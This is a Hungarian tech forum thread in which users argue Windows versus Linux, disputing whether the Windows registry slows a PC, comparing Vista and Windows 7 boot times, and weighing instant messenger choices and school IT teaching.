szerintem azt mondaná: "he? beszótá?""Minden iskolában ez van. Választás nincs."
én mást hallottam. tudtommal már érettségit is lehet linuxon/linux-szal..."A registry meg tényleg szar, lehet hogy nem lassít, de nehezen átlátható"
aha tehát most épp nincs rajta sapka."nem lehet tudni ránézésre mi mihez tartozik, csak utánanézve"
a Windows majdnem 60 millió sor kódból áll, szerinted logikus dolog, hogy valaki "ránézésre" akar tudni mindent, ahelyett, hogy utánanézzen egy leírásban? az autódat megszereled fejből?"Vista sp3 létezik? hmm én még csak sp2-nél tartok "
bétában már van, tavasszal-nyáron adják ki."Ha teljesen új rendszer lenne nem win-nek hívnák, és nem lenne kompatiblis a winnel..."
azt mondtam új, nem azt, hogy más. -
Sanyix
őstag
"középiskola végéig debianon toltam, olyan szinten, hogy az egyik admin voltam. mit is nevelnek belém?"
Most kb az egyetlen kivételt mondod? Mert ha megkérdeznél ma egy gyereket mi az az os, azt mondaná vindóz. Mit tanul? windózt meg wördöt. Ennyi. Minden iskolában ez van. Választás nincs.
A registry meg tényleg szar, lehet hogy nem lassít, de nehezen átlátható(nem lehet tudni ránézésre mi mihez tartozik, csak utánanézve), és egy szeméttdomb (tökmindegy hogy nem lassít, de otthon a szobádban sem hagysz ott minden szemetet ugye?).
Vista sp3 létezik? hmm én még csak sp2-nél tartok
"Win7 pedig egy teljesen új rendszer"
Ha teljesen új rendszer lenne nem win-nek hívnák, és nem lenne kompatiblis a winnel...
-
moonman
titán
-
Sanyix
őstag
hát ha valaki mondjuk linuxon amiatt akad fenn, hogy nem elég csicsás, az ottani alternatíva, az bizony nem normális. Ha veled ez van, kezeltesd magad. (azt sem értem miért használod ezt a puritán ph fórumot, teljesen gagyi az egész, sokkal szebb fórumtémák vannak
) Vagy használd az üzenőprogramot arra amire való. Én általában a szép fehér textboxot látom csak, mert kommunikálok vele, a főablakot is akkor nyitom meg ha rá akarok írni valakire, arra az 5 másodpercre.
A wlm meg nem minimálisan lassabb, hanem egy lassú szar, nem kicsit, és rohadt nagy is, borzalmas telepítővel.(egyébként az amsn úgy néz ki mint a wlm... lassú az is, de legalább nem foglal 200 mega helyet és 1 perc alatt feltelepül
)
-
válasz
Csakénvagyok #228 üzenetére
Pont emiatt furcsa, hogy
Windózos == Veér Pista
linuxos != Veér PistaDehogy meg is értsd: Itt vérpistikézed, azokat, akik feltették a Win7 bétát, de te a linux-al ugyanezt csinálod vazz!
-
moonman
titán
válasz
D4rkAv3ng3r #224 üzenetére
"W7 meg azért gyorsabb mert normálisabb drivert írt a gyártó"
ez így elég gyenge lett. az a driver fel fog menni Vistára is, a drivermodell 95%-ban megegyezik, hidd el, nem az új driverektől gyorsabb a Win7. -
VaniliásRönk
nagyúr
válasz
D4rkAv3ng3r #224 üzenetére
Te nagyon... szakember.
Igen, a Winamp Agent azért fut, mert elindítottam a Winampot.
A megoldás egy új kernel, legközelebb majd megkérem Vladit, hogy ugyan foltozza már be a hibát, nem akarom kivárni amíg a fejlesztők méltóztatnak megoldást találni rá.
A korábbi problémámra is széttárták a kezüket, ők ilyet még nem láttak. Én meg igen, a saját monitoromon, nem tudtam nem észrevenni.Szerk.: "W7 meg azért gyorsabb mert normálisabb drivert írt a gyártó" Nem érted meg, hogy ugyanazokat a meghajtókat tettem fel, mivel a hardware-ek jórészéhez nem is létezik még 7 meghajtó?
-
moonman
titán
válasz
D4rkAv3ng3r #223 üzenetére
"Na nehogy már azt mondjad, hogy a regisztrációs adatbázis nem egy félresikerült marhaság??!!"
ha egy kicsit is tudnád, vagy értenéd, hogy mi az és mire való, te sem mondanád."Konkrétan: ha használod is a gépet nem csak netre használod és sokszor telepítgetsz, akkor uninstallkor egy csomó szemét bentmarad. Ez tény."
tény. viszont egyrészt nem telepítgetek sokszor, másrészt a "szemét" nem lassít semmit. megintcsak: ha ismeréd a registry-t, tudnád."kell egy normális eltávolító program"
nem kell."a fölösleges regisztrációs kulcsok főleg ha sok van akkor igenis lassítják a gépet"
nem lassítják."Nem árt még persze egy Karbantartó progi is ami a használtaon kívüli szemetet is kitakarítja."
még milyen szemétre gondolsz? komolyan, te valami szeméttelepen dolgozol?"Próbáld meg letörlni például a Nero-t"
feltenni sem jutna eszembe."nézd meg egy karbantartó progival mennyi szemetet hagy maga után, de igaz ez a legtöbb játékra is. Stalker - CS után vagy 100 db bejegyzést kellett kigyomlálni."
és? úgy látszik, nem lehet elégszer leírni: nem lassít semmit."Akkor lehet te Linux suliba jártál de jobb ha tudod a legtöbb iskolában bizony Windows fut, és általában az is XP."
amikor én suliba jártam, az XP még sci-fi volt, de voltak bőven NT-k, vegyes termek voltak. a szerverek debian-ok voltak, sambával. mindegyiket használtuk, délután a szabadfoglalkozáson pedig mindenki eldöntötte, melyikhez ül. -
D4rkAv3ng3r
senior tag
válasz
VaniliásRönk #221 üzenetére
Winamp agent az azért fut mert 90 %-ban megy a Winamp is, amikor a Win de különben is nem mindegy neked?
A szakmai tudáson nem nagyképűsködést értetem, de nem is tudom ki volt aki az Ubuntu 9.10-es hírnél csak frösögött és fikázott ahelyett, hogy megkérdezte volna hogyan lehetne megoldani a problémát?Segítek TE voltál. Persze mindenki hülye aLinux szar, ez alap.
Talán ha nem fanboy-ként és nem anti-Linux-ként állnátok pár dologhoz hozzá nem lenne vita meg flame.A Vista boot-ra meg csak azért reagáltam, hogy attól még hogy nálad szar a rendszer a legtöbb embernél működik, persze aki felrakta a gépére. W7 meg azért gyorsabb mert normálisabb drivert írt a gyártó, ez sem a Vista sara ...
Nálam például a szar ASUS alaplapi driver miatt használhatalan az x64-es Vista mégsem szidom, mert nem szar, a legtöbb embernék meg működik jól. -
D4rkAv3ng3r
senior tag
Na gondoltam, hogy jössz és majd ködösítesz.
Na nehogy már azt mondjad, hogy a regisztrációs adatbázis nem egy félresikerült marhaság??!!
Konkrétan: ha használod is a gépet nem csak netre használod és sokszor telepítgetsz, akkor uninstallkor egy csomó szemét bentmarad. Ez tény. Ezért írtam, hogy kell egy normális eltávolító program (pl. Revo de lehet más is),mert a fölösleges regisztrációs kulcsok főleg ha sok van akkor igenis lassítják a gépet, ez is tény. Nem árt még persze egy Karbantartó progi is ami a használtaon kívüli szemetet is kitakarítja.
Próbáld meg letörlni például a Nero-t és nézd meg egy karbantartó progival mennyi szemetet hagy maga után, de igaz ez a legtöbb játékra is. Stalker - CS után vagy 100 db bejegyzést kellett kigyomlálni.Akkor lehet te Linux suliba jártál de jobb ha tudod a legtöbb iskolában bizony Windows fut, és általában az is XP.
-
VaniliásRönk
nagyúr
válasz
D4rkAv3ng3r #213 üzenetére
Szakmai tudás?
Még olvasni sem tudsz, legalábbis megterhelő lehet, mert odáig már nem jutottál el, hogy miért vagyok kiakadva a Vista bootolásán, kicsit kellett volna visszaolvasni. A 7 ugyanazon a vason ugyanazokkal a meghajtókkal másfél perc után használható, további kb. egy perc alatt teljesen befejezi a bootolást. Mindezt úgy, hogy az összes HP szutyok betölt, Vista alatt pedig minden automatikusan induló programot és felesleges szolgáltatást kitöröltem, letiltottam, mert sokszor már a hajamat téptem volna legszivesebben. (Ne kérdezz rá erre-arra, most utoljára írom le, csak a te két szép szemedért, mindent, más már megkérdezte, hogy a Winamp Agentet is? Hozzád hasonló kaliberű szaki lehetett, Winampot évek óta nem is láttam.)
Arról meg nem tehetek, hogy vagy a distróba, vagy rögtön a kernelbe mindig elrejtenek valami bugot a kedves fejlesztők, hol be sem bootol, hol lefagy bootolás után. Tudom, vennék Intelt meg nVidiát nem lenne gondom, na ezt nem fogom megtenni, ha maga Linus bácsi kér meg rá, akkor sem. -
Vladi
nagyúr
válasz
Major Major #216 üzenetére
"javaslat: néha nézz át az Ubuntu topicba, hogy kik kommentelnek a legtöbbet "
Hát én, a fő ubuntus. -
moonman
titán
válasz
D4rkAv3ng3r #213 üzenetére
"Már az iskolában az emberbe belenevelik a windows használatát, semmi alternatíva."
középiskola végéig debianon toltam, olyan szinten, hogy az egyik admin voltam. mit is nevelnek belém?"Egy srác mostani infó füzetét megnéztem. Mi a Winows? Az a szoftver (!!) ami a számítógép használtaához elengedhetetlen. WTF??"
és azon is így felháborodsz, ha a matekfüzetében találsz egy hibásan kiszámolt egyenletet? ez mit bizonyít? marhaságokat bárki leírhat."Mi a gondom a Win-nel? Azt, hogy végre azt a vacak registry database-t elfeljethenék már, mert az a rendszer átka."
nem azt mondtad az előbb, hogy az átlagnál jobban értesz hozzá?"Én persze ezt a gyengeséget kivédem Revo Uninstaller-ral, de egy átlagnál rosszabb felhasználó nem használ iylet"
ööö khmm izé. ez azon kívül, hogy kicsit nagyképűsködőnek hat, még szakmailag is hüjeség."csak azt veszi észre, hogy lassul az a Windows minél öregebb"
ezt majd megemlítem apámnak is, aki 6 éve ugyanazt az XP-t nyúzza, hogy vegye már észre."a Win 7 sem váltja meg a világot nyugodtan nevezhetnék azt Vista SP3-nak is ingyen ..."
nem nevezhetnénk, mert Vista SP3 létezik, a Win7 pedig egy teljesen új rendszer, érdekes lenne ingyen adni. nem kevered véletlenül a hómacska 10.6-tal? -
D4rkAv3ng3r
senior tag
válasz
Major Major #216 üzenetére
Lesett bocs.
Tényleg ... Na sorry ...
-
leviske
veterán
Hozzárendeli automatikusan az aláírást/avatart/nicket a WLA-hoz és onnan szedi le az első bejelentkezés után. Egyedül a hátteret nem tölti még fel.
A nagyság nem kérdés. A minimálisan lassabb reakcióidőt pedig kompenzálja a sokkal ízlésesebb külső, ami az alternatívák esetében skin-ként sem találtam. Persze ez mér ízlés kérdése.
(#69) MiZY: Én nem találkoztam egyik esetében sem ilyennel.
(#206) D4rkAv3ng3r: Az emesene talán a 2.0-val válhat egy normális alternatívává, de addig még sokat kell dolgozniuk a fiúknak.
Wine alól anno próbáltam a WLM-et. Még winetrick-ekkel teletömve sem akart normálisan működni.
-
Major Major
senior tag
válasz
D4rkAv3ng3r #207 üzenetére
javaslat: néha nézz át az Ubuntu topicba, hogy kik kommentelnek a legtöbbet
(#214) Vladi
bootol a hóhér, mióta a karmicot feltettem még nem rebootoltam vele, azt hittem a számítógépet használni kell, nem indítgatni -
Vladi
nagyúr
válasz
D4rkAv3ng3r #207 üzenetére
Tényleg Major Major, egy ubuntut bootolj má be próbaképp.
Új lehetsz errefelé.
-
D4rkAv3ng3r
senior tag
Ez nem így van!
Elárulom neked mi a helyzet úgy, hogy én mindkettő OS-t szeretem és használom is, szóval fanboy nem vagyok.Már az iskolában az emberbe belenevelik a windows használatát, semmi alternatíva. Én általános iskolában már tanultam informatikát. Amikor az OS volt a tananyag nekem még tanították általánosan mi az OS, mire való. és azt is, hogy létezik Linux, Apple. Persze mutatni nem mutattak, nem tanították egyiket se akkoriban Win 98 volt még csak azt tanították.
Mi a helyzet ma? Egy srác mostani infó füzetét megnéztem. Mi a Winows? Az a szoftver (!!) ami a számítógép használtaához elengedhetetlen. WTF?? Na ezek után kár magyarázni az ilyen gyerekeknek mi a Linux, OSX...Visszatérve rám én is Win-t használok már gyerkkorom óta, csak én nyitott voltam más alternatív OS-ekre is. Kubuntu-val kezdem és meg vagyok vele elégedve, mondjuk Win.-t elég jól ismerem, szóval átlagnál jobban értek hozzá. Nem logikátlan hanem tényleg más és jobb. Ez van.
Mi a gondom a Win-nel? Azt, hogy végre azt a vacak registry database-t elfeljethenék már, mert az a rendszer átka. Én persze ezt a gyengeséget kivédem Revo Uninstaller-ral, de egy átlagnál rosszabb felhasználó nem használ iylet, nem érdekli, csak azt veszi észre, hogy lassul az a Windows minél öregebb...
Szóval az MS-nek alapjaitól kelene pár dolgon változtatni, és a Win 7 sem váltja meg a világot nyugodtan nevezhetnék azt Vista SP3-nak is ingyen ...
VaniliásRönk: Nem én értelmesebben írok és értelmesebb is vagyok, mint te olvasd el az egész fröcsögés nélküli hsz.-em, csak a te hülyeséged és szakmai tudtalanságod idegesítő. Jótanács: Ha nem értesz egy OS-hez ne fikázz, mert nem szar az ami meghaladja a Te képességeidet!
-
VaniliásRönk
nagyúr
válasz
B+ milyen stílus ez b+, nyóckerbő ugrottá be b+?
Gondolkozz el szépen ezen is, meg a többin is amit leírtál, aztán gyere vissza b+.
-
moonman
titán
válasz
2 perc? az rohadt sok.
-
moonman
titán
ezt meg úgy nevezik, hogy sznobság. én olvasok Shakespeare-t, hozzá szimfónikus zenét hallgatok és Earl Gray teát iszogatok, azt mégsem érzem magam valami arisztokrata elit alakulatnak.
elég primitív általánosításnak gondolom, hogy amit sokan használnak, az csak szar lehet, mert a "tömegeknek" nincs igénye a jóra. ha annyival jobb lenne - ráadásul ingyen - már 15 éve mindenki mást használna.
-
D4rkAv3ng3r
senior tag
A KDE 4-gyel már nincs gond.
VaniliásRönk.
Hát b+ ne csodálkozz ha 5400 rpm-es HDD-d van hogy lassú a Win, és gondjaid vannak más OS-ekkel is. Elárulom, hogy a legtöbb ember desktop gépen nyúzza a Win-t és ott 7200 rpm a default. Ugye nem kell elmagyaráznom, hogy mennyi különbség van az adatátviteli sebbességben?
Szóval lásd be a te géped szar, nem a Vista, nálam az egy éve felpakolt eredeti SP2-es vista teleszarva millió progival 2 perc alatt bootol. (Igaz Kubuntu meg 1/2 perc alatt.
)
-
válasz
Csakénvagyok #197 üzenetére
Először is bocsánat a személyeskedésért, de ez most furcsán hatott nekem:
"Na az ilyen tette rögtön fel win7et."
Ajánlom olvasásra: Letölthető az Ubuntu 9.10 Jah! Hogy ott voltál...
-
D4rkAv3ng3r
senior tag
válasz
Major Major #64 üzenetére
No comment ...
Javaslat: (és ez úgy hogy Vista-t is használok Kubuntu mellett napi szintem) Próbálj ki egyszer egy *buntu disztrót live CD-ként nem kell telepíteni.
Ha nem játszanék akkor már rég nem lenne Win a gépemen ... (ami eredeti) -
D4rkAv3ng3r
senior tag
válasz
dajkopali #11 üzenetére
Erre csak azt tudom mondani, hogy ilyen felhasználóknak aki 2 dologra (net, meg msn) használják oda pont jobb egy openSUSE, *buntu. Persze legyalultatják mert gőzük sincs, hogy a Linux már rég nem olyan mint pár éve.
#22 leviske:
Dehogynem MSN helyett ott az emesene, ami elég sok mindnet tud, például a Plus szolgáltatásait is alapból. Vagy ha nem jön be akkor Wine-al ott a "rendes" MSN is.
A Pidgin és az aMSN nekem sem jön be. -
Morden24
nagyúr
válasz
Csakénvagyok #200 üzenetére
A kommentedből úgy jött le, hogy ezt (is) nehezményezed. Ha nem így van/volt, akkor sorry.
Új hozzászólás Aktív témák
Hirdetés
- Dell Latitude 5450 Intel Core Ultra 5 135U 4nm 32GB DDR5 érintőképernyős laptop Dell gari 2027.09.hó
- PlayStation 4/5 kontroller analóg cseréje HALL TMR érzékelősre, 1 év garancia!!! Nincs többé drift!!
- PlayStation 5/4 kontroller analóg cseréje HALL TMR érzékelősre, 1 év garancia!!! Nincs többé drift!!
- XBOX ONE/Series kontroller analóg cseréje HALL TMR érzékelősre, 1 év garancia!!! Nincs többé drift!!
- XBOX Series S 512GB, 6 hó garanciával Bp-i üzletből eladó!
- BESZÁMÍTÁS! Gigabyte B450 R7 5700X 32GB DDR4 512GB SSD RX 6700XT 12GB Rampage SHIVA be quiet! 650W
- Nothing Phone 1 128GB, Kártyafüggetlen, 1 Év Garanciával
- AKCIÓ! MSI B450 R5 5500 16GB DDR4 512GB SSD RTX 2060 Super 8GB GDDR6 Rampage Shiva Zalman 500W
- Csere-Beszámítás! RTX Számítógép játékra! I7 6700 / RTX 2060 6GB / 32GB DDR4 / 250SSD+500HDD
- AKCIÓ! Gigabyte H610M i5 13600K 16GB DDR4 512GB SSD RTX 3060Ti 8GB Zalman S2 TG Seasonic 650W
Állásajánlatok
Cég: Promenade Publishing House Kft.
Város: Budapest
Cég: CAMERA-PRO Hungary Kft
Város: Budapest